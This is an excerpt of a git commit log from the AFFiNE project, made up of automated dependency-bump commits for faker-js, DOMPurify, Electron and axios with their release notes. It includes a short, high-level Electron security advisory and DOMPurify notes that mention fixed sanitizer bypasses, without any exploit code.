<summary>faker-js/faker (@&#8203;faker-js/faker)</summary>

###
[`v10.0.0`](https://redirect.github.com/faker-js/faker/blob/HEAD/CHANGELOG.md#1000-2025-08-21)

[Compare
Source](https://redirect.github.com/faker-js/faker/compare/v9.9.0...v10.0.0)

##### New Locales

- **locale:** extended list of colors in Polish
([#&#8203;3586](https://redirect.github.com/faker-js/faker/issues/3586))
([9940d54](https://redirect.github.com/faker-js/faker/commit/9940d54f75205b65a74d11484cb385c85656a43f))

##### Features

- **locales:** add animal vocabulary(bear, bird, cat, rabbit, pet\_name)
in Korean
([#&#8203;3535](https://redirect.github.com/faker-js/faker/issues/3535))
([0d2143c](https://redirect.github.com/faker-js/faker/commit/0d2143c75d804d1dc53c17078eb59bc1970a07d1))

##### Changed Locales

- **locale:** remove invalid credit card issuer patterns
([#&#8203;3568](https://redirect.github.com/faker-js/faker/issues/3568))
([9783d95](https://redirect.github.com/faker-js/faker/commit/9783d95a8e43c45bc44c5c0c546b250b6c2ae140))

###
[`v9.9.0`](https://redirect.github.com/faker-js/faker/blob/HEAD/CHANGELOG.md#990-2025-07-01)

[Compare
Source](https://redirect.github.com/faker-js/faker/compare/v9.8.0...v9.9.0)

##### New Locales

- **locale:** add word data to pt\_br and pt\_pt locales
([#&#8203;3531](https://redirect.github.com/faker-js/faker/issues/3531))
([a405ac8](https://redirect.github.com/faker-js/faker/commit/a405ac8740bcfb2ec5f84c06752484a2b332a90a))

##### Features

- **location:** simple coordinate methods
([#&#8203;3528](https://redirect.github.com/faker-js/faker/issues/3528))
([d07d96d](https://redirect.github.com/faker-js/faker/commit/d07d96d01833085f2d3c5f9c851a572ebf8c47df))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjk3LjEwIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2025-09-22 12:18:23 +00:00
dependabot[bot] 93554304e2 chore: bump dompurify from 3.1.6 to 3.2.7 (#13622)
Bumps [dompurify](https://github.com/cure53/DOMPurify) from 3.1.6 to
3.2.7.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/cure53/DOMPurify/releases">dompurify's
releases</a>.</em></p>
<blockquote>
<h2>DOMPurify 3.2.7</h2>
<ul>
<li>Added new attributes and elements to default allow-list, thanks <a
href="https://github.com/elrion018"><code>@​elrion018</code></a></li>
<li>Added <code>tagName</code> parameter to custom element
<code>attributeNameCheck</code>, thanks <a
href="https://github.com/nelstrom"><code>@​nelstrom</code></a></li>
<li>Added better check for animated <code>href</code> attributes, thanks
<a href="https://github.com/llamakko"><code>@​llamakko</code></a></li>
<li>Updated and improved the bundled types, thanks <a
href="https://github.com/ssi02014"><code>@​ssi02014</code></a></li>
<li>Updated several tests to better align with new browser encoding
behaviors</li>
<li>Improved the handling of potentially risky content inside CDATA
elements, thanks <a
href="https://github.com/securityMB"><code>@​securityMB</code></a> &amp;
<a href="https://github.com/terjanq"><code>@​terjanq</code></a></li>
<li>Improved the regular expression for raw-text elements to cover
textareas, thanks <a
href="https://github.com/securityMB"><code>@​securityMB</code></a> &amp;
<a href="https://github.com/terjanq"><code>@​terjanq</code></a></li>
</ul>
<h2>DOMPurify 3.2.6</h2>
<ul>
<li>Fixed several typos and removed clutter from our documentation,
thanks <a
href="https://github.com/Rotzbua"><code>@​Rotzbua</code></a></li>
<li>Added <code>matrix:</code> as an allowed URI scheme, thanks <a
href="https://github.com/kleinesfilmroellchen"><code>@​kleinesfilmroellchen</code></a></li>
<li>Added better config hardening against prototype pollution, thanks <a
href="https://github.com/EffectRenan"><code>@​EffectRenan</code></a></li>
<li>Added better handling of attribute removal, thanks <a
href="https://github.com/michalnieruchalski-tiugo"><code>@​michalnieruchalski-tiugo</code></a></li>
<li>Added better configuration for aggressive mXSS scrubbing behavior,
thanks <a
href="https://github.com/BryanValverdeU"><code>@​BryanValverdeU</code></a></li>
<li>Removed the script that caused the fake entry <a
href="https://security.snyk.io/vuln/SNYK-JS-DOMPURIFY-10176060">CVE-2025-48050</a></li>
</ul>
<h2>DOMPurify 3.2.5</h2>
<ul>
<li>Added a check to the mXSS detection regex to be more strict, thanks
<a
href="https://github.com/masatokinugawa"><code>@​masatokinugawa</code></a></li>
<li>Added ESM type imports in source, removes patch function, thanks <a
href="https://github.com/donmccurdy"><code>@​donmccurdy</code></a></li>
<li>Added script to verify various TypeScript configurations, thanks <a
href="https://github.com/reduckted"><code>@​reduckted</code></a></li>
<li>Added more modern browsers to the Karma launchers list</li>
<li>Added Node 23.x to tested runtimes, removed Node 17.x</li>
<li>Fixed the generation of source maps, thanks <a
href="https://github.com/reduckted"><code>@​reduckted</code></a></li>
<li>Fixed an unexpected behavior with <code>ALLOWED_URI_REGEXP</code>
using the 'g' flag, thanks <a
href="https://github.com/hhk-png"><code>@​hhk-png</code></a></li>
<li>Fixed a few typos in the README file</li>
</ul>
<h2>DOMPurify 3.2.4</h2>
<ul>
<li>Fixed a conditional and config dependent mXSS-style <a
href="https://nsysean.github.io/posts/dompurify-323-bypass/">bypass</a>
reported by <a
href="https://github.com/nsysean"><code>@​nsysean</code></a></li>
<li>Added a new feature to allow specific hook removal, thanks <a
href="https://github.com/davecardwell"><code>@​davecardwell</code></a></li>
<li>Added <em>purify.js</em> and <em>purify.min.js</em> to exports,
thanks <a
href="https://github.com/Aetherinox"><code>@​Aetherinox</code></a></li>
<li>Added better logic in case no window object is president, thanks <a
href="https://github.com/yehuya"><code>@​yehuya</code></a></li>
<li>Updated some dependencies called out by dependabot</li>
<li>Updated license files etc to show the correct year</li>
</ul>
<h2>DOMPurify 3.2.3</h2>
<ul>
<li>Fixed two conditional sanitizer bypasses discovered by <a
href="https://github.com/parrot409"><code>@​parrot409</code></a> and <a
href="https://x.com/slonser_"><code>@​Slonser</code></a></li>
<li>Updated the attribute clobbering checks to prevent future bypasses,
thanks <a
href="https://github.com/parrot409"><code>@​parrot409</code></a></li>
</ul>
<h2>DOMPurify 3.2.2</h2>
<ul>
<li>Fixed a possible bypass in case a rather specific config for custom
elements is set, thanks <a
href="https://github.com/yaniv-git"><code>@​yaniv-git</code></a></li>
<li>Fixed several minor issues with the type definitions, thanks again
<a href="https://github.com/reduckted"><code>@​reduckted</code></a></li>
<li>Fixed a minor issue with the types reference for trusted types,
thanks <a
href="https://github.com/reduckted"><code>@​reduckted</code></a></li>
<li>Fixed a minor problem with the template detection regex on some
systems, thanks <a
href="https://github.com/svdb99"><code>@​svdb99</code></a></li>
</ul>
<h2>DOMPurify 3.2.1</h2>
<ul>
<li>Fixed several minor issues with the type definitions, thanks <a
href="https://github.com/reduckted"><code>@​reduckted</code></a> <a
href="https://github.com/ghiscoding"><code>@​ghiscoding</code></a> <a
href="https://github.com/asamuzaK"><code>@​asamuzaK</code></a> <a
href="https://github.com/MiniDigger"><code>@​MiniDigger</code></a></li>
<li>Fixed an issue with non-minified dist files and order of imports,
thanks <a
href="https://github.com/reduckted"><code>@​reduckted</code></a></li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="https://github.com/cure53/DOMPurify/commit/eaa0bdb26a1d0164af587d9059b98269008faece"><code>eaa0bdb</code></a>
Merge pull request <a
href="https://redirect.github.com/cure53/DOMPurify/issues/1144">#1144</a>
from cure53/main</li>
<li><a
href="https://github.com/cure53/DOMPurify/commit/f712593118c158c0daaf16527d804c84c96f4ce5"><code>f712593</code></a>
fix: removed a possibly dossy regex</li>
<li><a
href="https://github.com/cure53/DOMPurify/commit/eb9b3b68747fa2cf99629c6b764a14c041f96c23"><code>eb9b3b6</code></a>
Merge branch 'main' of github.com:cure53/DOMPurify</li>
<li><a
href="https://github.com/cure53/DOMPurify/commit/ce006f705cfa16836271d2d92cf0f57487361ac6"><code>ce006f7</code></a>
chore: Preparing 3.2.7 release</li>
<li><a
href="https://github.com/cure53/DOMPurify/commit/ef0e0cb6eb8bdee8ed9651b7340226136287aac1"><code>ef0e0cb</code></a>
chore: Preparing 3.2.6 release</li>
<li><a
href="https://github.com/cure53/DOMPurify/commit/2f09cd3c8ed58906e5cd12e9bebc15c60fd48c4c"><code>2f09cd3</code></a>
Update README.md</li>
<li><a
href="https://github.com/cure53/DOMPurify/commit/6a795bcf3e67712f481e8b32616e218d5a389cc3"><code>6a795bc</code></a>
Merge pull request <a
href="https://redirect.github.com/cure53/DOMPurify/issues/1142">#1142</a>
from cure53/dependabot/github_actions/actions/setup-...</li>
<li><a
href="https://github.com/cure53/DOMPurify/commit/2458bbdfcaf9b77423ef5e201a435f98ab229355"><code>2458bbd</code></a>
build(deps): bump actions/setup-node from 4 to 5</li>
<li><a
href="https://github.com/cure53/DOMPurify/commit/e43d3f354861f273852d16f35359f529199dc104"><code>e43d3f3</code></a>
Merge pull request <a
href="https://redirect.github.com/cure53/DOMPurify/issues/1136">#1136</a>
from cure53/dependabot/github_actions/actions/checko...</li>
<li><a
href="https://github.com/cure53/DOMPurify/commit/6f5be37ee02c145b30ca58b1c57264b1b84b99ff"><code>6f5be37</code></a>
build(deps): bump actions/checkout from 4 to 5</li>
<li>Additional commits viewable in <a
href="https://github.com/cure53/DOMPurify/compare/3.1.6...3.2.7">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=dompurify&package-manager=npm_and_yarn&previous-version=3.1.6&new-version=3.2.7)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/toeverything/AFFiNE/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-09-21 19:05:12 +00:00
renovate[bot] 2f38953cf9 chore: bump up electron version to v35.7.5 [SECURITY] (#13561)
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs
from Renovate will soon appear from 'Mend'. Learn more
[here](https://redirect.github.com/renovatebot/renovate/discussions/37842).

This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [electron](https://redirect.github.com/electron/electron) | [`35.5.1`
-> `35.7.5`](https://renovatebot.com/diffs/npm/electron/35.5.1/35.7.5) |
[![age](https://developer.mend.io/api/mc/badges/age/npm/electron/35.7.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/electron/35.5.1/35.7.5?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

### GitHub Vulnerability Alerts

####
[CVE-2025-55305](https://redirect.github.com/electron/electron/security/advisories/GHSA-vmqv-hx8q-j7mg)

### Impact
This only impacts apps that have the `embeddedAsarIntegrityValidation`
and `onlyLoadAppFromAsar`
[fuses](https://www.electronjs.org/docs/latest/tutorial/fuses) enabled.
Apps without these fuses enabled are not impacted.

Specifically this issue can only be exploited if your app is launched
from a filesystem the attacker has write access too. i.e. the ability to
edit files inside the `resources` folder in your app installation on
Windows which these fuses are supposed to protect against.

### Workarounds
There are no app side workarounds, you must update to a patched version
of Electron.

### Fixed Versions
* `38.0.0-beta.6`
* `37.3.1`
* `36.8.1`
* `35.7.5`

### For more information
If you have any questions or comments about this advisory, email us at
[security@electronjs.org](mailto:security@electronjs.org)

---

### Release Notes

<details>
<summary>electron/electron (electron)</summary>

###
[`v35.7.5`](https://redirect.github.com/electron/electron/releases/tag/v35.7.5):
electron v35.7.5

[Compare
Source](https://redirect.github.com/electron/electron/compare/v35.7.4...v35.7.5)

##### Release Notes for v35.7.5

> \[!WARNING]
> Electron 35.x.y has reached end-of-support as per the project's
[support
policy](https://www.electronjs.org/docs/latest/tutorial/electron-timelines#version-support-policy).
Developers and applications are encouraged to upgrade to a newer version
of Electron.

##### Fixes

- Fixed an issue where `shell.openPath` was not non-blocking as
expected.
[#&#8203;48079](https://redirect.github.com/electron/electron/pull/48079)
<span style="font-size:small;">(Also in
[36](https://redirect.github.com/electron/electron/pull/48088),
[37](https://redirect.github.com/electron/electron/pull/48088),
[38](https://redirect.github.com/electron/electron/pull/48088))</span>

###
[`v35.7.4`](https://redirect.github.com/electron/electron/releases/tag/v35.7.4):
electron v35.7.4

[Compare
Source](https://redirect.github.com/electron/electron/compare/v35.7.2...v35.7.4)

##### Release Notes for v35.7.4

- Fix ffmpeg generation on Windows non-x64

###
[`v35.7.2`](https://redirect.github.com/electron/electron/releases/tag/v35.7.2):
electron v35.7.2

[Compare
Source](https://redirect.github.com/electron/electron/compare/v35.7.0...v35.7.2)

##### Release Notes for v35.7.2

##### Fixes

- Fixed an issue where printing PDFs with `webContents.print({ silent:
true })` would fail.
[#&#8203;47645](https://redirect.github.com/electron/electron/pull/47645)
<span style="font-size:small;">(Also in
[36](https://redirect.github.com/electron/electron/pull/47624),
[37](https://redirect.github.com/electron/electron/pull/47397))</span>

###
[`v35.7.0`](https://redirect.github.com/electron/electron/releases/tag/v35.7.0):
electron v35.7.0

[Compare
Source](https://redirect.github.com/electron/electron/compare/v35.6.0...v35.7.0)

##### Release Notes for v35.7.0

##### Other Changes

- Updated Node.js to v22.16.0.
[#&#8203;47213](https://redirect.github.com/electron/electron/pull/47213)

###
[`v35.6.0`](https://redirect.github.com/electron/electron/releases/tag/v35.6.0):
electron v35.6.0

[Compare
Source](https://redirect.github.com/electron/electron/compare/v35.5.1...v35.6.0)

##### Release Notes for v35.6.0

##### Features

- Added support for `--no-experimental-global-navigator` flag.
[#&#8203;47416](https://redirect.github.com/electron/electron/pull/47416)
<span style="font-size:small;">(Also in
[36](https://redirect.github.com/electron/electron/pull/47417),
[37](https://redirect.github.com/electron/electron/pull/47418))</span>
- Added support for customizing system accent color and highlighting of
active window border.
[#&#8203;47539](https://redirect.github.com/electron/electron/pull/47539)
<span style="font-size:small;">(Also in
[36](https://redirect.github.com/electron/electron/pull/47538),
[37](https://redirect.github.com/electron/electron/pull/47537))</span>

##### Fixes

- Fixed a potential crash using `session.clearData` in some
circumstances.
[#&#8203;47410](https://redirect.github.com/electron/electron/pull/47410)
<span style="font-size:small;">(Also in
[36](https://redirect.github.com/electron/electron/pull/47411),
[37](https://redirect.github.com/electron/electron/pull/47412))</span>
- Fixed an error when importing `electron` for the first time from an
ESM module loaded by a CJS module in a packaged app.
[#&#8203;47344](https://redirect.github.com/electron/electron/pull/47344)
<span style="font-size:small;">(Also in
[36](https://redirect.github.com/electron/electron/pull/47343),
[37](https://redirect.github.com/electron/electron/pull/47342))</span>
- Fixed an issue where calling `Fetch.continueResponse` via debugger
with `WebContentsView` could cause a crash.
[#&#8203;47443](https://redirect.github.com/electron/electron/pull/47443)
<span style="font-size:small;">(Also in
[36](https://redirect.github.com/electron/electron/pull/47442),
[37](https://redirect.github.com/electron/electron/pull/47444))</span>
- Fixed an issue where utility processes could leak file handles.
[#&#8203;47542](https://redirect.github.com/electron/electron/pull/47542)
<span style="font-size:small;">(Also in
[36](https://redirect.github.com/electron/electron/pull/47541),
[37](https://redirect.github.com/electron/electron/pull/47543))</span>
- Partially fixes an issue with printing a PDF via `webContents.print()`
where the callback would not be called.
[#&#8203;47399](https://redirect.github.com/electron/electron/pull/47399)
<span style="font-size:small;">(Also in
[36](https://redirect.github.com/electron/electron/pull/47400),
[37](https://redirect.github.com/electron/electron/pull/47398))</span>

##### Other Changes

- Backported fix for
[`4206375`](https://redirect.github.com/electron/electron/commit/420637585).
[#&#8203;47369](https://redirect.github.com/electron/electron/pull/47369)

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45MS4xIiwidXBkYXRlZEluVmVyIjoiNDEuOTcuMTAiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2025-09-21 18:47:57 +00:00
dependabot[bot] 2d0721a78f chore: bump axios from 1.9.0 to 1.12.2 (#13621)
Bumps [axios](https://github.com/axios/axios) from 1.9.0 to 1.12.2.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/axios/axios/releases">axios's
releases</a>.</em></p>
<blockquote>
<h2>Release v1.12.2</h2>
<h2>Release notes:</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> use current global fetch instead of cached
one when env fetch is not specified to keep MSW support; (<a
href="https://redirect.github.com/axios/axios/issues/7030">#7030</a>)
(<a
href="https://github.com/axios/axios/commit/cf78825e1229b60d1629ad0bbc8a752ff43c3f53">cf78825</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+247/-16
([#7030](https://github.com/axios/axios/issues/7030)
[#7022](https://github.com/axios/axios/issues/7022)
[#7024](https://github.com/axios/axios/issues/7024) )">Dmitriy
Mozgovoy</a></li>
<li><!-- raw HTML omitted --> <a href="https://github.com/noritaka1166"
title="+2/-6 ([#7028](https://github.com/axios/axios/issues/7028)
[#7029](https://github.com/axios/axios/issues/7029) )">Noritaka
Kobayashi</a></li>
</ul>
<h2>Release v1.12.1</h2>
<h2>Release notes:</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>types:</strong> fixed env config types; (<a
href="https://redirect.github.com/axios/axios/issues/7020">#7020</a>)
(<a
href="https://github.com/axios/axios/commit/b5f26b75bdd9afa95016fb67d0cab15fc74cbf05">b5f26b7</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+10/-4
([#7020](https://github.com/axios/axios/issues/7020) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h2>Release v1.12.0</h2>
<h2>Release notes:</h2>
<h3>Bug Fixes</h3>
<ul>
<li>adding build artifacts (<a
href="https://github.com/axios/axios/commit/9ec86de257bfa33856571036279169f385ed92bd">9ec86de</a>)</li>
<li>dont add dist on release (<a
href="https://github.com/axios/axios/commit/a2edc3606a4f775d868a67bb3461ff18ce7ecd11">a2edc36</a>)</li>
<li><strong>fetch-adapter:</strong> set correct Content-Type for Node
FormData (<a
href="https://redirect.github.com/axios/axios/issues/6998">#6998</a>)
(<a
href="https://github.com/axios/axios/commit/a9f47afbf3224d2ca987dbd8188789c7ea853c5d">a9f47af</a>)</li>
<li><strong>node:</strong> enforce maxContentLength for data: URLs (<a
href="https://redirect.github.com/axios/axios/issues/7011">#7011</a>)
(<a
href="https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593">945435f</a>)</li>
<li>package exports (<a
href="https://redirect.github.com/axios/axios/issues/5627">#5627</a>)
(<a
href="https://github.com/axios/axios/commit/aa78ac23fc9036163308c0f6bd2bb885e7af3f36">aa78ac2</a>)</li>
<li><strong>params:</strong> removing '[' and ']' from URL encode
exclude characters (<a
href="https://redirect.github.com/axios/axios/issues/3316">#3316</a>)
(<a
href="https://redirect.github.com/axios/axios/issues/5715">#5715</a>)
(<a
href="https://github.com/axios/axios/commit/6d84189349c43b1dcdd977b522610660cc4c7042">6d84189</a>)</li>
<li>release pr run (<a
href="https://github.com/axios/axios/commit/fd7f404488b2c4f238c2fbe635b58026a634bfd2">fd7f404</a>)</li>
<li><strong>types:</strong> change the type guard on isCancel (<a
href="https://redirect.github.com/axios/axios/issues/5595">#5595</a>)
(<a
href="https://github.com/axios/axios/commit/0dbb7fd4f61dc568498cd13a681fa7f907d6ec7e">0dbb7fd</a>)</li>
</ul>
<h3>Features</h3>
<ul>
<li><strong>adapter:</strong> surface low‑level network error details;
attach original error via cause (<a
href="https://redirect.github.com/axios/axios/issues/6982">#6982</a>)
(<a
href="https://github.com/axios/axios/commit/78b290c57c978ed2ab420b90d97350231c9e5d74">78b290c</a>)</li>
<li><strong>fetch:</strong> add fetch, Request, Response env config
variables for the adapter; (<a
href="https://redirect.github.com/axios/axios/issues/7003">#7003</a>)
(<a
href="https://github.com/axios/axios/commit/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b">c959ff2</a>)</li>
<li>support reviver on JSON.parse (<a
href="https://redirect.github.com/axios/axios/issues/5926">#5926</a>)
(<a
href="https://github.com/axios/axios/commit/2a9763426e43d996fd60d01afe63fa6e1f5b4fca">2a97634</a>),
closes <a
href="https://redirect.github.com/axios/axios/issues/5924">#5924</a></li>
<li><strong>types:</strong> extend AxiosResponse interface to include
custom headers type (<a
href="https://redirect.github.com/axios/axios/issues/6782">#6782</a>)
(<a
href="https://github.com/axios/axios/commit/7960d34eded2de66ffd30b4687f8da0e46c4903e">7960d34</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/WillianAgostini" title="+132/-16760
([#7002](https://github.com/axios/axios/issues/7002)
[#5926](https://github.com/axios/axios/issues/5926)
[#6782](https://github.com/axios/axios/issues/6782) )">Willian
Agostini</a></li>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+4263/-293
([#7006](https://github.com/axios/axios/issues/7006)
[#7003](https://github.com/axios/axios/issues/7003) )">Dmitriy
Mozgovoy</a></li>
<li><!-- raw HTML omitted --> <a href="https://github.com/mkhani01"
title="+111/-15 ([#6982](https://github.com/axios/axios/issues/6982)
)">khani</a></li>
<li><!-- raw HTML omitted --> <a href="https://github.com/AmeerAssadi"
title="+123/-0 ([#7011](https://github.com/axios/axios/issues/7011)
)">Ameer Assadi</a></li>
<li><!-- raw HTML omitted --> <a href="https://github.com/emiedonmokumo"
title="+55/-35 ([#6998](https://github.com/axios/axios/issues/6998)
)">Emiedonmokumo Dick-Boro</a></li>
<li><!-- raw HTML omitted --> <a href="https://github.com/opsysdebug"
title="+8/-8 ([#6980](https://github.com/axios/axios/issues/6980)
)">Zeroday BYTE</a></li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/axios/axios/blob/v1.x/CHANGELOG.md">axios's
changelog</a>.</em></p>
<blockquote>
<h2><a
href="https://github.com/axios/axios/compare/v1.12.1...v1.12.2">1.12.2</a>
(2025-09-14)</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> use current global fetch instead of cached
one when env fetch is not specified to keep MSW support; (<a
href="https://redirect.github.com/axios/axios/issues/7030">#7030</a>)
(<a
href="https://github.com/axios/axios/commit/cf78825e1229b60d1629ad0bbc8a752ff43c3f53">cf78825</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+247/-16
([#7030](https://github.com/axios/axios/issues/7030)
[#7022](https://github.com/axios/axios/issues/7022)
[#7024](https://github.com/axios/axios/issues/7024) )">Dmitriy
Mozgovoy</a></li>
<li><!-- raw HTML omitted --> <a href="https://github.com/noritaka1166"
title="+2/-6 ([#7028](https://github.com/axios/axios/issues/7028)
[#7029](https://github.com/axios/axios/issues/7029) )">Noritaka
Kobayashi</a></li>
</ul>
<h2><a
href="https://github.com/axios/axios/compare/v1.12.0...v1.12.1">1.12.1</a>
(2025-09-12)</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>types:</strong> fixed env config types; (<a
href="https://redirect.github.com/axios/axios/issues/7020">#7020</a>)
(<a
href="https://github.com/axios/axios/commit/b5f26b75bdd9afa95016fb67d0cab15fc74cbf05">b5f26b7</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+10/-4
([#7020](https://github.com/axios/axios/issues/7020) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h1><a
href="https://github.com/axios/axios/compare/v1.11.0...v1.12.0">1.12.0</a>
(2025-09-11)</h1>
<h3>Bug Fixes</h3>
<ul>
<li>adding build artifacts (<a
href="https://github.com/axios/axios/commit/9ec86de257bfa33856571036279169f385ed92bd">9ec86de</a>)</li>
<li>dont add dist on release (<a
href="https://github.com/axios/axios/commit/a2edc3606a4f775d868a67bb3461ff18ce7ecd11">a2edc36</a>)</li>
<li><strong>fetch-adapter:</strong> set correct Content-Type for Node
FormData (<a
href="https://redirect.github.com/axios/axios/issues/6998">#6998</a>)
(<a
href="https://github.com/axios/axios/commit/a9f47afbf3224d2ca987dbd8188789c7ea853c5d">a9f47af</a>)</li>
<li><strong>node:</strong> enforce maxContentLength for data: URLs (<a
href="https://redirect.github.com/axios/axios/issues/7011">#7011</a>)
(<a
href="https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593">945435f</a>)</li>
<li>package exports (<a
href="https://redirect.github.com/axios/axios/issues/5627">#5627</a>)
(<a
href="https://github.com/axios/axios/commit/aa78ac23fc9036163308c0f6bd2bb885e7af3f36">aa78ac2</a>)</li>
<li><strong>params:</strong> removing '[' and ']' from URL encode
exclude characters (<a
href="https://redirect.github.com/axios/axios/issues/3316">#3316</a>)
(<a
href="https://redirect.github.com/axios/axios/issues/5715">#5715</a>)
(<a
href="https://github.com/axios/axios/commit/6d84189349c43b1dcdd977b522610660cc4c7042">6d84189</a>)</li>
<li>release pr run (<a
href="https://github.com/axios/axios/commit/fd7f404488b2c4f238c2fbe635b58026a634bfd2">fd7f404</a>)</li>
<li><strong>types:</strong> change the type guard on isCancel (<a
href="https://redirect.github.com/axios/axios/issues/5595">#5595</a>)
(<a
href="https://github.com/axios/axios/commit/0dbb7fd4f61dc568498cd13a681fa7f907d6ec7e">0dbb7fd</a>)</li>
</ul>
<h3>Features</h3>
<ul>
<li><strong>adapter:</strong> surface low‑level network error details;
attach original error via cause (<a
href="https://redirect.github.com/axios/axios/issues/6982">#6982</a>)
(<a
href="https://github.com/axios/axios/commit/78b290c57c978ed2ab420b90d97350231c9e5d74">78b290c</a>)</li>
<li><strong>fetch:</strong> add fetch, Request, Response env config
variables for the adapter; (<a
href="https://redirect.github.com/axios/axios/issues/7003">#7003</a>)
(<a
href="https://github.com/axios/axios/commit/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b">c959ff2</a>)</li>
<li>support reviver on JSON.parse (<a
href="https://redirect.github.com/axios/axios/issues/5926">#5926</a>)
(<a
href="https://github.com/axios/axios/commit/2a9763426e43d996fd60d01afe63fa6e1f5b4fca">2a97634</a>),
closes <a
href="https://redirect.github.com/axios/axios/issues/5924">#5924</a></li>
<li><strong>types:</strong> extend AxiosResponse interface to include
custom headers type (<a
href="https://redirect.github.com/axios/axios/issues/6782">#6782</a>)
(<a
href="https://github.com/axios/axios/commit/7960d34eded2de66ffd30b4687f8da0e46c4903e">7960d34</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/WillianAgostini" title="+132/-16760
([#7002](https://github.com/axios/axios/issues/7002)
[#5926](https://github.com/axios/axios/issues/5926)
[#6782](https://github.com/axios/axios/issues/6782) )">Willian
Agostini</a></li>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+4263/-293
([#7006](https://github.com/axios/axios/issues/7006)
[#7003](https://github.com/axios/axios/issues/7003) )">Dmitriy
Mozgovoy</a></li>
